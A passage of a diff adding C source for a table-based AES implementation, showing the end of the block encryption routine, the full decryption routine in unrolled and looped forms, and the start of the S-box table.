+#endif /* ?FULL_UNROLL */
+
+    assert(in && out && key);
+    rk = key->rd_key;
+
+    /*
+     * map byte array block to cipher state
+     * and add initial round key:
+     */
+    s0 = GETU32(in     ) ^ rk[0];
+    s1 = GETU32(in +  4) ^ rk[1];
+    s2 = GETU32(in +  8) ^ rk[2];
+    s3 = GETU32(in + 12) ^ rk[3];
+#ifdef FULL_UNROLL
+    /* round 1: */
+    t0 = Te0[s0 >> 24] ^ Te1[(s1 >> 16) & 0xff] ^ Te2[(s2 >>  8) & 0xff] ^ Te3[s3 & 0xff] ^ rk[ 4];
+    t1 = Te0[s1 >> 24] ^ Te1[(s2 >> 16) & 0xff] ^ Te2[(s3 >>  8) & 0xff] ^ Te3[s0 & 0xff] ^ rk[ 5];
+    t2 = Te0[s2 >> 24] ^ Te1[(s3 >> 16) & 0xff] ^ Te2[(s0 >>  8) & 0xff] ^ Te3[s1 & 0xff] ^ rk[ 6];
+    t3 = Te0[s3 >> 24] ^ Te1[(s0 >> 16) & 0xff] ^ Te2[(s1 >>  8) & 0xff] ^ Te3[s2 & 0xff] ^ rk[ 7];
+    /* round 2: */
+    s0 = Te0[t0 >> 24] ^ Te1[(t1 >> 16) & 0xff] ^ Te2[(t2 >>  8) & 0xff] ^ Te3[t3 & 0xff] ^ rk[ 8];
+    s1 = Te0[t1 >> 24] ^ Te1[(t2 >> 16) & 0xff] ^ Te2[(t3 >>  8) & 0xff] ^ Te3[t0 & 0xff] ^ rk[ 9];
+    s2 = Te0[t2 >> 24] ^ Te1[(t3 >> 16) & 0xff] ^ Te2[(t0 >>  8) & 0xff] ^ Te3[t1 & 0xff] ^ rk[10];
+    s3 = Te0[t3 >> 24] ^ Te1[(t0 >> 16) & 0xff] ^ Te2[(t1 >>  8) & 0xff] ^ Te3[t2 & 0xff] ^ rk[11];
+    /* round 3: */
+    t0 = Te0[s0 >> 24] ^ Te1[(s1 >> 16) & 0xff] ^ Te2[(s2 >>  8) & 0xff] ^ Te3[s3 & 0xff] ^ rk[12];
+    t1 = Te0[s1 >> 24] ^ Te1[(s2 >> 16) & 0xff] ^ Te2[(s3 >>  8) & 0xff] ^ Te3[s0 & 0xff] ^ rk[13];
+    t2 = Te0[s2 >> 24] ^ Te1[(s3 >> 16) & 0xff] ^ Te2[(s0 >>  8) & 0xff] ^ Te3[s1 & 0xff] ^ rk[14];
+    t3 = Te0[s3 >> 24] ^ Te1[(s0 >> 16) & 0xff] ^ Te2[(s1 >>  8) & 0xff] ^ Te3[s2 & 0xff] ^ rk[15];
+    /* round 4: */
+    s0 = Te0[t0 >> 24] ^ Te1[(t1 >> 16) & 0xff] ^ Te2[(t2 >>  8) & 0xff] ^ Te3[t3 & 0xff] ^ rk[16];
+    s1 = Te0[t1 >> 24] ^ Te1[(t2 >> 16) & 0xff] ^ Te2[(t3 >>  8) & 0xff] ^ Te3[t0 & 0xff] ^ rk[17];
+    s2 = Te0[t2 >> 24] ^ Te1[(t3 >> 16) & 0xff] ^ Te2[(t0 >>  8) & 0xff] ^ Te3[t1 & 0xff] ^ rk[18];
+    s3 = Te0[t3 >> 24] ^ Te1[(t0 >> 16) & 0xff] ^ Te2[(t1 >>  8) & 0xff] ^ Te3[t2 & 0xff] ^ rk[19];
+    /* round 5: */
+    t0 = Te0[s0 >> 24] ^ Te1[(s1 >> 16) & 0xff] ^ Te2[(s2 >>  8) & 0xff] ^ Te3[s3 & 0xff] ^ rk[20];
+    t1 = Te0[s1 >> 24] ^ Te1[(s2 >> 16) & 0xff] ^ Te2[(s3 >>  8) & 0xff] ^ Te3[s0 & 0xff] ^ rk[21];
+    t2 = Te0[s2 >> 24] ^ Te1[(s3 >> 16) & 0xff] ^ Te2[(s0 >>  8) & 0xff] ^ Te3[s1 & 0xff] ^ rk[22];
+    t3 = Te0[s3 >> 24] ^ Te1[(s0 >> 16) & 0xff] ^ Te2[(s1 >>  8) & 0xff] ^ Te3[s2 & 0xff] ^ rk[23];
+    /* round 6: */
+    s0 = Te0[t0 >> 24] ^ Te1[(t1 >> 16) & 0xff] ^ Te2[(t2 >>  8) & 0xff] ^ Te3[t3 & 0xff] ^ rk[24];
+    s1 = Te0[t1 >> 24] ^ Te1[(t2 >> 16) & 0xff] ^ Te2[(t3 >>  8) & 0xff] ^ Te3[t0 & 0xff] ^ rk[25];
+    s2 = Te0[t2 >> 24] ^ Te1[(t3 >> 16) & 0xff] ^ Te2[(t0 >>  8) & 0xff] ^ Te3[t1 & 0xff] ^ rk[26];
+    s3 = Te0[t3 >> 24] ^ Te1[(t0 >> 16) & 0xff] ^ Te2[(t1 >>  8) & 0xff] ^ Te3[t2 & 0xff] ^ rk[27];
+    /* round 7: */
+    t0 = Te0[s0 >> 24] ^ Te1[(s1 >> 16) & 0xff] ^ Te2[(s2 >>  8) & 0xff] ^ Te3[s3 & 0xff] ^ rk[28];
+    t1 = Te0[s1 >> 24] ^ Te1[(s2 >> 16) & 0xff] ^ Te2[(s3 >>  8) & 0xff] ^ Te3[s0 & 0xff] ^ rk[29];
+    t2 = Te0[s2 >> 24] ^ Te1[(s3 >> 16) & 0xff] ^ Te2[(s0 >>  8) & 0xff] ^ Te3[s1 & 0xff] ^ rk[30];
+    t3 = Te0[s3 >> 24] ^ Te1[(s0 >> 16) & 0xff] ^ Te2[(s1 >>  8) & 0xff] ^ Te3[s2 & 0xff] ^ rk[31];
+    /* round 8: */
+    s0 = Te0[t0 >> 24] ^ Te1[(t1 >> 16) & 0xff] ^ Te2[(t2 >>  8) & 0xff] ^ Te3[t3 & 0xff] ^ rk[32];
+    s1 = Te0[t1 >> 24] ^ Te1[(t2 >> 16) & 0xff] ^ Te2[(t3 >>  8) & 0xff] ^ Te3[t0 & 0xff] ^ rk[33];
+    s2 = Te0[t2 >> 24] ^ Te1[(t3 >> 16) & 0xff] ^ Te2[(t0 >>  8) & 0xff] ^ Te3[t1 & 0xff] ^ rk[34];
+    s3 = Te0[t3 >> 24] ^ Te1[(t0 >> 16) & 0xff] ^ Te2[(t1 >>  8) & 0xff] ^ Te3[t2 & 0xff] ^ rk[35];
+    /* round 9: */
+    t0 = Te0[s0 >> 24] ^ Te1[(s1 >> 16) & 0xff] ^ Te2[(s2 >>  8) & 0xff] ^ Te3[s3 & 0xff] ^ rk[36];
+    t1 = Te0[s1 >> 24] ^ Te1[(s2 >> 16) & 0xff] ^ Te2[(s3 >>  8) & 0xff] ^ Te3[s0 & 0xff] ^ rk[37];
+    t2 = Te0[s2 >> 24] ^ Te1[(s3 >> 16) & 0xff] ^ Te2[(s0 >>  8) & 0xff] ^ Te3[s1 & 0xff] ^ rk[38];
+    t3 = Te0[s3 >> 24] ^ Te1[(s0 >> 16) & 0xff] ^ Te2[(s1 >>  8) & 0xff] ^ Te3[s2 & 0xff] ^ rk[39];
+    if (key->rounds > 10) {
+        /* round 10: */
+        s0 = Te0[t0 >> 24] ^ Te1[(t1 >> 16) & 0xff] ^ Te2[(t2 >>  8) & 0xff] ^ Te3[t3 & 0xff] ^ rk[40];
+        s1 = Te0[t1 >> 24] ^ Te1[(t2 >> 16) & 0xff] ^ Te2[(t3 >>  8) & 0xff] ^ Te3[t0 & 0xff] ^ rk[41];
+        s2 = Te0[t2 >> 24] ^ Te1[(t3 >> 16) & 0xff] ^ Te2[(t0 >>  8) & 0xff] ^ Te3[t1 & 0xff] ^ rk[42];
+        s3 = Te0[t3 >> 24] ^ Te1[(t0 >> 16) & 0xff] ^ Te2[(t1 >>  8) & 0xff] ^ Te3[t2 & 0xff] ^ rk[43];
+        /* round 11: */
+        t0 = Te0[s0 >> 24] ^ Te1[(s1 >> 16) & 0xff] ^ Te2[(s2 >>  8) & 0xff] ^ Te3[s3 & 0xff] ^ rk[44];
+        t1 = Te0[s1 >> 24] ^ Te1[(s2 >> 16) & 0xff] ^ Te2[(s3 >>  8) & 0xff] ^ Te3[s0 & 0xff] ^ rk[45];
+        t2 = Te0[s2 >> 24] ^ Te1[(s3 >> 16) & 0xff] ^ Te2[(s0 >>  8) & 0xff] ^ Te3[s1 & 0xff] ^ rk[46];
+        t3 = Te0[s3 >> 24] ^ Te1[(s0 >> 16) & 0xff] ^ Te2[(s1 >>  8) & 0xff] ^ Te3[s2 & 0xff] ^ rk[47];
+        if (key->rounds > 12) {
+            /* round 12: */
+            s0 = Te0[t0 >> 24] ^ Te1[(t1 >> 16) & 0xff] ^ Te2[(t2 >>  8) & 0xff] ^ Te3[t3 & 0xff] ^ rk[48];
+            s1 = Te0[t1 >> 24] ^ Te1[(t2 >> 16) & 0xff] ^ Te2[(t3 >>  8) & 0xff] ^ Te3[t0 & 0xff] ^ rk[49];
+            s2 = Te0[t2 >> 24] ^ Te1[(t3 >> 16) & 0xff] ^ Te2[(t0 >>  8) & 0xff] ^ Te3[t1 & 0xff] ^ rk[50];
+            s3 = Te0[t3 >> 24] ^ Te1[(t0 >> 16) & 0xff] ^ Te2[(t1 >>  8) & 0xff] ^ Te3[t2 & 0xff] ^ rk[51];
+            /* round 13: */
+            t0 = Te0[s0 >> 24] ^ Te1[(s1 >> 16) & 0xff] ^ Te2[(s2 >>  8) & 0xff] ^ Te3[s3 & 0xff] ^ rk[52];
+            t1 = Te0[s1 >> 24] ^ Te1[(s2 >> 16) & 0xff] ^ Te2[(s3 >>  8) & 0xff] ^ Te3[s0 & 0xff] ^ rk[53];
+            t2 = Te0[s2 >> 24] ^ Te1[(s3 >> 16) & 0xff] ^ Te2[(s0 >>  8) & 0xff] ^ Te3[s1 & 0xff] ^ rk[54];
+            t3 = Te0[s3 >> 24] ^ Te1[(s0 >> 16) & 0xff] ^ Te2[(s1 >>  8) & 0xff] ^ Te3[s2 & 0xff] ^ rk[55];
+        }
+    }
+    rk += key->rounds << 2;
+#else  /* !FULL_UNROLL */
+    /*
+     * Nr - 1 full rounds:
+     */
+    r = key->rounds >> 1;
+    for (;;) {
+        t0 =
+            Te0[(s0 >> 24)       ] ^
+            Te1[(s1 >> 16) & 0xff] ^
+            Te2[(s2 >>  8) & 0xff] ^
+            Te3[(s3      ) & 0xff] ^
+            rk[4];
+        t1 =
+            Te0[(s1 >> 24)       ] ^
+            Te1[(s2 >> 16) & 0xff] ^
+            Te2[(s3 >>  8) & 0xff] ^
+            Te3[(s0      ) & 0xff] ^
+            rk[5];
+        t2 =
+            Te0[(s2 >> 24)       ] ^
+            Te1[(s3 >> 16) & 0xff] ^
+            Te2[(s0 >>  8) & 0xff] ^
+            Te3[(s1      ) & 0xff] ^
+            rk[6];
+        t3 =
+            Te0[(s3 >> 24)       ] ^
+            Te1[(s0 >> 16) & 0xff] ^
+            Te2[(s1 >>  8) & 0xff] ^
+            Te3[(s2      ) & 0xff] ^
+            rk[7];
+
+        rk += 8;
+        if (--r == 0) {
+            break;
+        }
+
+        s0 =
+            Te0[(t0 >> 24)       ] ^
+            Te1[(t1 >> 16) & 0xff] ^
+            Te2[(t2 >>  8) & 0xff] ^
+            Te3[(t3      ) & 0xff] ^
+            rk[0];
+        s1 =
+            Te0[(t1 >> 24)       ] ^
+            Te1[(t2 >> 16) & 0xff] ^
+            Te2[(t3 >>  8) & 0xff] ^
+            Te3[(t0      ) & 0xff] ^
+            rk[1];
+        s2 =
+            Te0[(t2 >> 24)       ] ^
+            Te1[(t3 >> 16) & 0xff] ^
+            Te2[(t0 >>  8) & 0xff] ^
+            Te3[(t1      ) & 0xff] ^
+            rk[2];
+        s3 =
+            Te0[(t3 >> 24)       ] ^
+            Te1[(t0 >> 16) & 0xff] ^
+            Te2[(t1 >>  8) & 0xff] ^
+            Te3[(t2      ) & 0xff] ^
+            rk[3];
+    }
+#endif /* ?FULL_UNROLL */
+    /*
+     * apply last round and
+     * map cipher state to byte array block:
+     */
+    s0 =
+        (Te2[(t0 >> 24)       ] & 0xff000000) ^
+        (Te3[(t1 >> 16) & 0xff] & 0x00ff0000) ^
+        (Te0[(t2 >>  8) & 0xff] & 0x0000ff00) ^
+        (Te1[(t3      ) & 0xff] & 0x000000ff) ^
+        rk[0];
+    PUTU32(out     , s0);
+    s1 =
+        (Te2[(t1 >> 24)       ] & 0xff000000) ^
+        (Te3[(t2 >> 16) & 0xff] & 0x00ff0000) ^
+        (Te0[(t3 >>  8) & 0xff] & 0x0000ff00) ^
+        (Te1[(t0      ) & 0xff] & 0x000000ff) ^
+        rk[1];
+    PUTU32(out +  4, s1);
+    s2 =
+        (Te2[(t2 >> 24)       ] & 0xff000000) ^
+        (Te3[(t3 >> 16) & 0xff] & 0x00ff0000) ^
+        (Te0[(t0 >>  8) & 0xff] & 0x0000ff00) ^
+        (Te1[(t1      ) & 0xff] & 0x000000ff) ^
+        rk[2];
+    PUTU32(out +  8, s2);
+    s3 =
+        (Te2[(t3 >> 24)       ] & 0xff000000) ^
+        (Te3[(t0 >> 16) & 0xff] & 0x00ff0000) ^
+        (Te0[(t1 >>  8) & 0xff] & 0x0000ff00) ^
+        (Te1[(t2      ) & 0xff] & 0x000000ff) ^
+        rk[3];
+    PUTU32(out + 12, s3);
+}
+
+/*
+ * Decrypt a single block
+ * in and out can overlap
+ */
+void AES_decrypt(const unsigned char *in, unsigned char *out,
+                 const AES_KEY *key)
+{
+
+    const u32 *rk;
+    u32 s0, s1, s2, s3, t0, t1, t2, t3;
+#ifndef FULL_UNROLL
+    int r;
+#endif /* ?FULL_UNROLL */
+
+    assert(in && out && key);
+    rk = key->rd_key;
+
+    /*
+     * map byte array block to cipher state
+     * and add initial round key:
+     */
+    s0 = GETU32(in     ) ^ rk[0];
+    s1 = GETU32(in +  4) ^ rk[1];
+    s2 = GETU32(in +  8) ^ rk[2];
+    s3 = GETU32(in + 12) ^ rk[3];
+#ifdef FULL_UNROLL
+    /* round 1: */
+    t0 = Td0[s0 >> 24] ^ Td1[(s3 >> 16) & 0xff] ^ Td2[(s2 >>  8) & 0xff] ^ Td3[s1 & 0xff] ^ rk[ 4];
+    t1 = Td0[s1 >> 24] ^ Td1[(s0 >> 16) & 0xff] ^ Td2[(s3 >>  8) & 0xff] ^ Td3[s2 & 0xff] ^ rk[ 5];
+    t2 = Td0[s2 >> 24] ^ Td1[(s1 >> 16) & 0xff] ^ Td2[(s0 >>  8) & 0xff] ^ Td3[s3 & 0xff] ^ rk[ 6];
+    t3 = Td0[s3 >> 24] ^ Td1[(s2 >> 16) & 0xff] ^ Td2[(s1 >>  8) & 0xff] ^ Td3[s0 & 0xff] ^ rk[ 7];
+    /* round 2: */
+    s0 = Td0[t0 >> 24] ^ Td1[(t3 >> 16) & 0xff] ^ Td2[(t2 >>  8) & 0xff] ^ Td3[t1 & 0xff] ^ rk[ 8];
+    s1 = Td0[t1 >> 24] ^ Td1[(t0 >> 16) & 0xff] ^ Td2[(t3 >>  8) & 0xff] ^ Td3[t2 & 0xff] ^ rk[ 9];
+    s2 = Td0[t2 >> 24] ^ Td1[(t1 >> 16) & 0xff] ^ Td2[(t0 >>  8) & 0xff] ^ Td3[t3 & 0xff] ^ rk[10];
+    s3 = Td0[t3 >> 24] ^ Td1[(t2 >> 16) & 0xff] ^ Td2[(t1 >>  8) & 0xff] ^ Td3[t0 & 0xff] ^ rk[11];
+    /* round 3: */
+    t0 = Td0[s0 >> 24] ^ Td1[(s3 >> 16) & 0xff] ^ Td2[(s2 >>  8) & 0xff] ^ Td3[s1 & 0xff] ^ rk[12];
+    t1 = Td0[s1 >> 24] ^ Td1[(s0 >> 16) & 0xff] ^ Td2[(s3 >>  8) & 0xff] ^ Td3[s2 & 0xff] ^ rk[13];
+    t2 = Td0[s2 >> 24] ^ Td1[(s1 >> 16) & 0xff] ^ Td2[(s0 >>  8) & 0xff] ^ Td3[s3 & 0xff] ^ rk[14];
+    t3 = Td0[s3 >> 24] ^ Td1[(s2 >> 16) & 0xff] ^ Td2[(s1 >>  8) & 0xff] ^ Td3[s0 & 0xff] ^ rk[15];
+    /* round 4: */
+    s0 = Td0[t0 >> 24] ^ Td1[(t3 >> 16) & 0xff] ^ Td2[(t2 >>  8) & 0xff] ^ Td3[t1 & 0xff] ^ rk[16];
+    s1 = Td0[t1 >> 24] ^ Td1[(t0 >> 16) & 0xff] ^ Td2[(t3 >>  8) & 0xff] ^ Td3[t2 & 0xff] ^ rk[17];
+    s2 = Td0[t2 >> 24] ^ Td1[(t1 >> 16) & 0xff] ^ Td2[(t0 >>  8) & 0xff] ^ Td3[t3 & 0xff] ^ rk[18];
+    s3 = Td0[t3 >> 24] ^ Td1[(t2 >> 16) & 0xff] ^ Td2[(t1 >>  8) & 0xff] ^ Td3[t0 & 0xff] ^ rk[19];
+    /* round 5: */
+    t0 = Td0[s0 >> 24] ^ Td1[(s3 >> 16) & 0xff] ^ Td2[(s2 >>  8) & 0xff] ^ Td3[s1 & 0xff] ^ rk[20];
+    t1 = Td0[s1 >> 24] ^ Td1[(s0 >> 16) & 0xff] ^ Td2[(s3 >>  8) & 0xff] ^ Td3[s2 & 0xff] ^ rk[21];
+    t2 = Td0[s2 >> 24] ^ Td1[(s1 >> 16) & 0xff] ^ Td2[(s0 >>  8) & 0xff] ^ Td3[s3 & 0xff] ^ rk[22];
+    t3 = Td0[s3 >> 24] ^ Td1[(s2 >> 16) & 0xff] ^ Td2[(s1 >>  8) & 0xff] ^ Td3[s0 & 0xff] ^ rk[23];
+    /* round 6: */
+    s0 = Td0[t0 >> 24] ^ Td1[(t3 >> 16) & 0xff] ^ Td2[(t2 >>  8) & 0xff] ^ Td3[t1 & 0xff] ^ rk[24];
+    s1 = Td0[t1 >> 24] ^ Td1[(t0 >> 16) & 0xff] ^ Td2[(t3 >>  8) & 0xff] ^ Td3[t2 & 0xff] ^ rk[25];
+    s2 = Td0[t2 >> 24] ^ Td1[(t1 >> 16) & 0xff] ^ Td2[(t0 >>  8) & 0xff] ^ Td3[t3 & 0xff] ^ rk[26];
+    s3 = Td0[t3 >> 24] ^ Td1[(t2 >> 16) & 0xff] ^ Td2[(t1 >>  8) & 0xff] ^ Td3[t0 & 0xff] ^ rk[27];
+    /* round 7: */
+    t0 = Td0[s0 >> 24] ^ Td1[(s3 >> 16) & 0xff] ^ Td2[(s2 >>  8) & 0xff] ^ Td3[s1 & 0xff] ^ rk[28];
+    t1 = Td0[s1 >> 24] ^ Td1[(s0 >> 16) & 0xff] ^ Td2[(s3 >>  8) & 0xff] ^ Td3[s2 & 0xff] ^ rk[29];
+    t2 = Td0[s2 >> 24] ^ Td1[(s1 >> 16) & 0xff] ^ Td2[(s0 >>  8) & 0xff] ^ Td3[s3 & 0xff] ^ rk[30];
+    t3 = Td0[s3 >> 24] ^ Td1[(s2 >> 16) & 0xff] ^ Td2[(s1 >>  8) & 0xff] ^ Td3[s0 & 0xff] ^ rk[31];
+    /* round 8: */
+    s0 = Td0[t0 >> 24] ^ Td1[(t3 >> 16) & 0xff] ^ Td2[(t2 >>  8) & 0xff] ^ Td3[t1 & 0xff] ^ rk[32];
+    s1 = Td0[t1 >> 24] ^ Td1[(t0 >> 16) & 0xff] ^ Td2[(t3 >>  8) & 0xff] ^ Td3[t2 & 0xff] ^ rk[33];
+    s2 = Td0[t2 >> 24] ^ Td1[(t1 >> 16) & 0xff] ^ Td2[(t0 >>  8) & 0xff] ^ Td3[t3 & 0xff] ^ rk[34];
+    s3 = Td0[t3 >> 24] ^ Td1[(t2 >> 16) & 0xff] ^ Td2[(t1 >>  8) & 0xff] ^ Td3[t0 & 0xff] ^ rk[35];
+    /* round 9: */
+    t0 = Td0[s0 >> 24] ^ Td1[(s3 >> 16) & 0xff] ^ Td2[(s2 >>  8) & 0xff] ^ Td3[s1 & 0xff] ^ rk[36];
+    t1 = Td0[s1 >> 24] ^ Td1[(s0 >> 16) & 0xff] ^ Td2[(s3 >>  8) & 0xff] ^ Td3[s2 & 0xff] ^ rk[37];
+    t2 = Td0[s2 >> 24] ^ Td1[(s1 >> 16) & 0xff] ^ Td2[(s0 >>  8) & 0xff] ^ Td3[s3 & 0xff] ^ rk[38];
+    t3 = Td0[s3 >> 24] ^ Td1[(s2 >> 16) & 0xff] ^ Td2[(s1 >>  8) & 0xff] ^ Td3[s0 & 0xff] ^ rk[39];
+    if (key->rounds > 10) {
+        /* round 10: */
+        s0 = Td0[t0 >> 24] ^ Td1[(t3 >> 16) & 0xff] ^ Td2[(t2 >>  8) & 0xff] ^ Td3[t1 & 0xff] ^ rk[40];
+        s1 = Td0[t1 >> 24] ^ Td1[(t0 >> 16) & 0xff] ^ Td2[(t3 >>  8) & 0xff] ^ Td3[t2 & 0xff] ^ rk[41];
+        s2 = Td0[t2 >> 24] ^ Td1[(t1 >> 16) & 0xff] ^ Td2[(t0 >>  8) & 0xff] ^ Td3[t3 & 0xff] ^ rk[42];
+        s3 = Td0[t3 >> 24] ^ Td1[(t2 >> 16) & 0xff] ^ Td2[(t1 >>  8) & 0xff] ^ Td3[t0 & 0xff] ^ rk[43];
+        /* round 11: */
+        t0 = Td0[s0 >> 24] ^ Td1[(s3 >> 16) & 0xff] ^ Td2[(s2 >>  8) & 0xff] ^ Td3[s1 & 0xff] ^ rk[44];
+        t1 = Td0[s1 >> 24] ^ Td1[(s0 >> 16) & 0xff] ^ Td2[(s3 >>  8) & 0xff] ^ Td3[s2 & 0xff] ^ rk[45];
+        t2 = Td0[s2 >> 24] ^ Td1[(s1 >> 16) & 0xff] ^ Td2[(s0 >>  8) & 0xff] ^ Td3[s3 & 0xff] ^ rk[46];
+        t3 = Td0[s3 >> 24] ^ Td1[(s2 >> 16) & 0xff] ^ Td2[(s1 >>  8) & 0xff] ^ Td3[s0 & 0xff] ^ rk[47];
+        if (key->rounds > 12) {
+            /* round 12: */
+            s0 = Td0[t0 >> 24] ^ Td1[(t3 >> 16) & 0xff] ^ Td2[(t2 >>  8) & 0xff] ^ Td3[t1 & 0xff] ^ rk[48];
+            s1 = Td0[t1 >> 24] ^ Td1[(t0 >> 16) & 0xff] ^ Td2[(t3 >>  8) & 0xff] ^ Td3[t2 & 0xff] ^ rk[49];
+            s2 = Td0[t2 >> 24] ^ Td1[(t1 >> 16) & 0xff] ^ Td2[(t0 >>  8) & 0xff] ^ Td3[t3 & 0xff] ^ rk[50];
+            s3 = Td0[t3 >> 24] ^ Td1[(t2 >> 16) & 0xff] ^ Td2[(t1 >>  8) & 0xff] ^ Td3[t0 & 0xff] ^ rk[51];
+            /* round 13: */
+            t0 = Td0[s0 >> 24] ^ Td1[(s3 >> 16) & 0xff] ^ Td2[(s2 >>  8) & 0xff] ^ Td3[s1 & 0xff] ^ rk[52];
+            t1 = Td0[s1 >> 24] ^ Td1[(s0 >> 16) & 0xff] ^ Td2[(s3 >>  8) & 0xff] ^ Td3[s2 & 0xff] ^ rk[53];
+            t2 = Td0[s2 >> 24] ^ Td1[(s1 >> 16) & 0xff] ^ Td2[(s0 >>  8) & 0xff] ^ Td3[s3 & 0xff] ^ rk[54];
+            t3 = Td0[s3 >> 24] ^ Td1[(s2 >> 16) & 0xff] ^ Td2[(s1 >>  8) & 0xff] ^ Td3[s0 & 0xff] ^ rk[55];
+        }
+    }
+    rk += key->rounds << 2;
+#else  /* !FULL_UNROLL */
+    /*
+     * Nr - 1 full rounds:
+     */
+    r = key->rounds >> 1;
+    for (;;) {
+        t0 =
+            Td0[(s0 >> 24)       ] ^
+            Td1[(s3 >> 16) & 0xff] ^
+            Td2[(s2 >>  8) & 0xff] ^
+            Td3[(s1      ) & 0xff] ^
+            rk[4];
+        t1 =
+            Td0[(s1 >> 24)       ] ^
+            Td1[(s0 >> 16) & 0xff] ^
+            Td2[(s3 >>  8) & 0xff] ^
+            Td3[(s2      ) & 0xff] ^
+            rk[5];
+        t2 =
+            Td0[(s2 >> 24)       ] ^
+            Td1[(s1 >> 16) & 0xff] ^
+            Td2[(s0 >>  8) & 0xff] ^
+            Td3[(s3      ) & 0xff] ^
+            rk[6];
+        t3 =
+            Td0[(s3 >> 24)       ] ^
+            Td1[(s2 >> 16) & 0xff] ^
+            Td2[(s1 >>  8) & 0xff] ^
+            Td3[(s0      ) & 0xff] ^
+            rk[7];
+
+        rk += 8;
+        if (--r == 0) {
+            break;
+        }
+
+        s0 =
+            Td0[(t0 >> 24)       ] ^
+            Td1[(t3 >> 16) & 0xff] ^
+            Td2[(t2 >>  8) & 0xff] ^
+            Td3[(t1      ) & 0xff] ^
+            rk[0];
+        s1 =
+            Td0[(t1 >> 24)       ] ^
+            Td1[(t0 >> 16) & 0xff] ^
+            Td2[(t3 >>  8) & 0xff] ^
+            Td3[(t2      ) & 0xff] ^
+            rk[1];
+        s2 =
+            Td0[(t2 >> 24)       ] ^
+            Td1[(t1 >> 16) & 0xff] ^
+            Td2[(t0 >>  8) & 0xff] ^
+            Td3[(t3      ) & 0xff] ^
+            rk[2];
+        s3 =
+            Td0[(t3 >> 24)       ] ^
+            Td1[(t2 >> 16) & 0xff] ^
+            Td2[(t1 >>  8) & 0xff] ^
+            Td3[(t0      ) & 0xff] ^
+            rk[3];
+    }
+#endif /* ?FULL_UNROLL */
+    /*
+     * apply last round and
+     * map cipher state to byte array block:
+     */
+    s0 =
+        (Td4[(t0 >> 24)       ] << 24) ^
+        (Td4[(t3 >> 16) & 0xff] << 16) ^
+        (Td4[(t2 >>  8) & 0xff] <<  8) ^
+        (Td4[(t1      ) & 0xff])       ^
+        rk[0];
+    PUTU32(out     , s0);
+    s1 =
+        (Td4[(t1 >> 24)       ] << 24) ^
+        (Td4[(t0 >> 16) & 0xff] << 16) ^
+        (Td4[(t3 >>  8) & 0xff] <<  8) ^
+        (Td4[(t2      ) & 0xff])       ^
+        rk[1];
+    PUTU32(out +  4, s1);
+    s2 =
+        (Td4[(t2 >> 24)       ] << 24) ^
+        (Td4[(t1 >> 16) & 0xff] << 16) ^
+        (Td4[(t0 >>  8) & 0xff] <<  8) ^
+        (Td4[(t3      ) & 0xff])       ^
+        rk[2];
+    PUTU32(out +  8, s2);
+    s3 =
+        (Td4[(t3 >> 24)       ] << 24) ^
+        (Td4[(t2 >> 16) & 0xff] << 16) ^
+        (Td4[(t1 >>  8) & 0xff] <<  8) ^
+        (Td4[(t0      ) & 0xff])       ^
+        rk[3];
+    PUTU32(out + 12, s3);
+}
+
+#else /* AES_ASM */
+
+static const u8 Te4[256] = {
+    0x63U, 0x7cU, 0x77U, 0x7bU, 0xf2U, 0x6bU, 0x6fU, 0xc5U,
+    0x30U, 0x01U, 0x67U, 0x2bU, 0xfeU, 0xd7U, 0xabU, 0x76U,
+    0xcaU, 0x82U, 0xc9U, 0x7dU, 0xfaU, 0x59U, 0x47U, 0xf0U,
+    0xadU, 0xd4U, 0xa2U, 0xafU, 0x9cU, 0xa4U, 0x72U, 0xc0U,
+    0xb7U, 0xfdU, 0x93U, 0x26U, 0x36U, 0x3fU, 0xf7U, 0xccU,
+    0x34U, 0xa5U, 0xe5U, 0xf1U, 0x71U, 0xd8U, 0x31U, 0x15U,
+    0x04U, 0xc7U, 0x23U, 0xc3U, 0x18U, 0x96U, 0x05U, 0x9aU,
+    0x07U, 0x12U, 0x80U, 0xe2U, 0xebU, 0x27U, 0xb2U, 0x75U,
+    0x09U, 0x83U, 0x2cU, 0x1aU, 0x1bU, 0x6eU, 0x5aU, 0xa0U,
+    0x52U, 0x3bU, 0xd6U, 0xb3U, 0x29U, 0xe3U, 0x2fU, 0x84U,
+    0x53U, 0xd1U, 0x00U, 0xedU, 0x20U, 0xfcU, 0xb1U, 0x5bU,
+    0x6aU, 0xcbU, 0xbeU, 0x39U, 0x4aU, 0x4cU, 0x58U, 0xcfU,
+    0xd0U, 0xefU, 0xaaU, 0xfbU, 0x43U, 0x4dU, 0x33U, 0x85U,
+    0x45U, 0xf9U, 0x02U, 0x7fU, 0x50U, 0x3cU, 0x9fU, 0xa8U,
+    0x51U, 0xa3U, 0x40U, 0x8fU, 0x92U, 0x9dU, 0x38U, 0xf5U,
+    0xbcU, 0xb6U, 0xdaU, 0x21U, 0x10U, 0xffU, 0xf3U, 0xd2U,
+    0xcdU, 0x0cU, 0x13U, 0xecU, 0x5fU, 0x97U, 0x44U, 0x17U,
+    0xc4U, 0xa7U, 0x7eU, 0x3dU, 0x64U, 0x5dU, 0x19U, 0x73U,
+    0x60U, 0x81U, 0x4fU, 0xdcU, 0x22U, 0x2aU, 0x90U, 0x88U,
+    0x46U, 0xeeU, 0xb8U, 0x14U, 0xdeU, 0x5eU, 0x0bU, 0xdbU,
+    0xe0U, 0x32U, 0x3aU, 0x0aU, 0x49U, 0x06U, 0x24U, 0x5cU,
+    0xc2U, 0xd3U, 0xacU, 0x62U, 0x91U, 0x95U, 0xe4U, 0x79U,
+    0xe7U, 0xc8U, 0x37U, 0x6dU, 0x8dU, 0xd5U, 0x4eU, 0xa9U,
+    0x6cU, 0x56U, 0xf4U, 0xeaU, 0x65U, 0x7aU, 0xaeU, 0x08U,
+    0xbaU, 0x78U, 0x25U, 0x2eU, 0x1cU, 0xa6U, 0xb4U, 0xc6U,
+    0xe8U, 0xddU, 0x74U, 0x1fU, 0x4bU, 0xbdU, 0x8bU, 0x8aU,
+    0x70U, 0x3eU, 0xb5U, 0x66U, 0x48U, 0x03U, 0xf6U, 0x0eU,
+    0x61U, 0x35U, 0x57U, 0xb9U, 0x86U, 0xc1U, 0x1dU, 0x9eU,
+    0xe1U, 0xf8U, 0x98U, 0x11U, 0x69U, 0xd9U, 0x8eU, 0x94U,
+    0x9bU, 0x1eU, 0x87U, 0xe9U, 0xceU, 0x55U, 0x28U, 0xdfU,
+    0x8cU, 0xa1U, 0x89U, 0x0dU, 0xbfU, 0xe6U, 0x42U, 0x68U,
+    0x41U, 0x99U, 0x2dU, 0x0fU, 0xb0U, 0x54U, 0xbbU, 0x16U
+};
+static const u32 rcon[] = {
